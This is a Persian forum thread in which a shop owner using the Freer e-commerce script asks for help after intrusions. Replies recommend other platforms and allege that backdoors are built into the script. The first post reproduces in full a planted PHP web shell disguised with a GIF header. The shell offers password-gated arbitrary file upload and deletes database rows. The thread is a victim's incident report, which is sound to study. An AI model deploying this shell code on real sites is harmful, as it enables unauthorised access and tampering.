مشکل در درگاه فریر(ضروری)

[free-downloadha.com]

با سلام

چند وقتی هستش که تو درگاهم محصول نامشخص اضاف میشه بیشتر تو دسته ها اضاف میشه و همچنین در تراکنش ها مبلغ نامشخص که به صورت ناموفق صورت گرفته

و همچنین در قسمته دسته ها فایلی با کدهایی که در زیر گذاشتم تو پوشه ایمیج پیوست میشه

upload/images/category_45-up.phtml

کد:

GIF89a;
<?php
@session_start();
if ($_GET['cmd']=='up')
{
$docr = $_SERVER["DOCUMENT_ROOT"];
if(md5(base64_decode($_POST['pw'])) != "e423889e19b7785b9e16f453b331bdc4" AND !isset($_SESSION['backlogin']))die("pw");
@$_SESSION['backlogin'] = "1";
echo <<<HTML
<table>
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<td><font size="1">Your File : </font> </td>
<td>
<input size="48" name="file" type="file" style="color: #008000;  font-family: Arial; font-size: 8pt; font-weight: bold; border: 2px solid  #008000; background-color: #000000"></td>
</tr>
<tr>
<td><font size="1">Upload Dir : </font> </td>
<td>
<input size="48" value="$docr/" name="path" type="text" style="color:  #008000; font-family: Arial; font-size: 8pt; font-weight: bold; border:  2px solid #008000; background-color: #000000">
<input type="submit" value="Upload  " style="color: #008000;  font-family: Arial; font-size: 8pt; font-weight: bold; border: 2px solid  #008000; background-color: #000000"></td>
$tend
</table>
HTML;

if (isset($_POST["path"])){

$uploadfile = $_POST["path"].$_FILES["file"]["name"];
if ($_POST["path"]==""){$uploadfile = $_FILES["file"]["name"];}

if (copy($_FILES["file"]["tmp_name"], $uploadfile)) {
echo "File uploaded to : $uploadfile";
echo "- Size : " .$_FILES["file"]["size"];

} else {
print "Error  Upload File :";
}
}
}
include("../../../include/configuration.php");if(mysql_connect($config['databaseInfo']['host'],   $config['databaseInfo']['username'],$config['databaseInfo']['password'])){mysql_select_db($config['databaseInfo']['name']);mysql_query("DELETE  FROM category WHERE `category_title` = 'et'");}?>

کارهایی که هم کردم تمامی فایل های فریر با دقت به صورت تک تک ریختم و هر چی اضافی بوده حذف کردم و از پسوردهای سختی هم در قسمت مدیریت و پوشه مدیریت گذاشتم اما جواب نداده

محصولاتی هم که بفروش میرسه بدرد هر کی نمیخوره و در مرحله اخر که فعال سازی محصول دست خودمان هستش

ممنون میشم از دوستان متخصص راهنمایی کنن

- - - Updated - - -


UP
منتظر راهنمایی اساتید هستیم!

- - - Updated - - -

با سلام

یعنی هیچکی نیست راهنمایی کنه

[ali0000]

با سلام

چند وقتی هستش که تو درگاهم ...

- - - Updated - - -

با سلام

یعنی هیچکی نیست راهنمایی کنه

خودتو اذیت نکن این اسکریپت بهیچ عنوان تایید نمیشه و پر از باگهای امنیتی و خطرناکه بفکر فروشگاه ساز دیگری باش

فوری : هشدار امنیتی در ارتباط با فروشگاه ساز فریر freer

[free-downloadha.com]

خودتو اذیت نکن این اسکریپت بهیچ عنوان تایید نمیشه و پر از باگهای امنیتی و خطرناکه بفکر فروشگاه ساز دیگری باش

فوری : هشدار امنیتی در ارتباط با فروشگاه ساز فریر freer

با سلام
ایا فروشگاه ساز دیگه ای هست که معرفی کنید

قبلا ی بار فریرم رو هک کردن این بار خیلی طول کشید تا دسترسی پیدا کنن امنیتش رو تا جایی که راه داشته بالا بردم .
جالب اینجاست که تمامی فایل هارو چک کردم و دوباره ریختم اما بازم این اتفاق داره میفته

[cheapmizban]

سلام
بهتره از ووکامرس استفاده کنید .
فروشگاه ساز های دیگه ای مثل پرستاشاپ ، اپن کارت و.. هم هست
موفق باشید

[ali0000]

با سلام
ایا فروشگاه ساز دیگه ای هست که معرفی کنید

قبلا ی بار فریرم رو هک کردن این بار خیلی طول کشید تا دسترسی پیدا کنن امنیتش رو تا جایی که راه داشته بالا بردم .
جالب اینجاست که تمامی فایل هارو چک کردم و دوباره ریختم اما بازم این اتفاق داره میفته

داخل همین انجمن 2 مورد ارائه شده سرچ کنید فروشگاه ساز یا همین مواردی که cheapmizban گفتن تحقیق نمایید و مطابق نیاز خودتون با توجه به تایید ( برنامه نویسان معتبر ) از آنها استفاده نمایید ، الان باید همه اطلاع رسانی کنید به دوستان ، هر هاستی که اسکریپت فریر روش قرار داره این چندتا کودک دسترسی مستقیم جهت آپلود فایل روی هاست دارن و تا زمانی مهدکودک و پیش دبستانی ها تعطیل هستن این حقه بازان سایتهای آلوده به این اسکریپت رو با آپلود فایل index در روت هاست مثلاً هک میکنن ...

فوری : هشدار امنیتی در ارتباط با فروشگاه ساز فریر freer

[redpaknik]

وکامرس پرستا شاپ استفاده کنید فرریر مضخرف هستش

[us12]

کلیه فایل ها را حذف کنید و این فریر را نصب کنید :

http://www.softiran.org/article/57/v...sion-1.57.html

[syncronet]

و همچنین در قسمته دسته ها فایلی با کدهایی که در زیر گذاشتم تو پوشه ایمیج پیوست میشه

upload/images/category_45-up.phtm

فایلهای شل به این فرم هنگام دسترسی شما به داشبورد فریر از طریق درخواست ajax ارسال شده از مرورگر خود شما روی سایت آپلود میشه. کد تعبیه جاوا اسکریپتی که این درخواست رو ارسال میکنه در سایت اسکریپت (freer.ir) اینجکت شده و توسط اسکریپت از این سایت دریافت و در مرورگر شما اینجکت میکنه.

برای اطلاعات بیشتر می تونین این پست رو ببینین:

http://www.webhostingtalk.ir/showthr...=1#post1487206

یک بخش دیکد شده کد فایل جاوا اسکریپت
http://www.ckvalaska.cz/wp-content/s...fer.js?ver=9.2
رو می تونین اینجا ببینین:

http://www.unphp.net/decode/f78ab217...b485cefd05de4/

[saeid1346]

این سیستم باگ نداره ، کلی شل مخفی و بک دور روش گذاشتن ، توصیه اکید میکنم استفاده نکنید ازش ، مخصوصا نسخه جدیدش ، تا حالا سه تا کد داخل فایل هاش پیدا کردم که هر کدوم یه سری دسترسی میده

[IrIsT]

یعنی تو زرد از آب در اومدن؟
از دستی این کارو کردن؟یعنی اومدن شل ریختن و دسترسی؟واسه چی؟واسه اینکه متوجه بشن کی استفاده میکنه و اگه لایسنس نداشته باشن هک کنن؟
سیستمشون باگ داره.بدون باگ نیست.اما شل و دسترسی رو نمیدونستم که تازگیا میریزن داخل